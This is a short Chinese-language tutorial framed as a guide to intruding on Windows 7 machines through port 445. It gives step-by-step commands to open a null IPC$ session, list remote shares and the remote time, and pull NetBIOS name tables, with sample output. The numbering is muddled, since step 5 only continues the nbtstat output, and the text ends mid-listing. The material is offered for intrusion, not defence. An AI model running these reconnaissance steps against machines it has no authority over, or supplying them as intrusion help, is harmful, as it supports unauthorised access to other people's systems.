win7 445端口入侵教程

1、首先，我们先建立一个空会话（当然，这需要目标开放 ipc$ ） 命令： net use \\ip\ipc$ "" /user:"" 注意：上面的命令包括四个空格， net 与 use 中间有一个空格， use 后面一个，密码左右各一个空格。

2、查看远程主机的共享资源 命令： net view \\ip 解释：前提是建立了空连接后，用此命令可以查看远程主机的共享资源，如果它开了共享，可以得到如下面的结果，但此命令不能显示默认共享。 在 \\*.*.*.* 的共享资源 资源共享名 类型 用途 注释 ----------------------------------------------------------- NETLOGON Disk Logon server share SYSVOL Disk Logon server share 命令成功完成。 

3、查看远程主机的当前时间，命令： net time \\ip解释：用此命令可以得到一个远程主机的当前时间。

4、得到远程主机的 NetBIOS 用户名列表（需要打开自己的 NBT ） 命令： nbtstat -A ip 用此命令可以得到一个远程主机的 NetBIOS 用户名列表，返回如下结果： Node IpAddress: [*.*.*.*] Scope Id: [] NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- SERVER <00> UNIQUE Registered OYAMANISHI-H <00> GROUP Registered OYAMANISHI-H < 1C > GROUP Registered 

5、SERVER <20> UNIQUE Registered OYAMANISHI-H <1B> UNIQUE Registered OYAMANISHI-H <1E> GROUP Registered SERVER <03> UNIQUE Registered OYAMANISHI-H <1D> UNIQUE Registered ..__MSBROWSE__.<01> GROUP Registered INet~Services < 1C > GROUP Registered IS~SERVER......<00> UNIQUE Registered MAC Address = 00-50-8B -9A -2D-37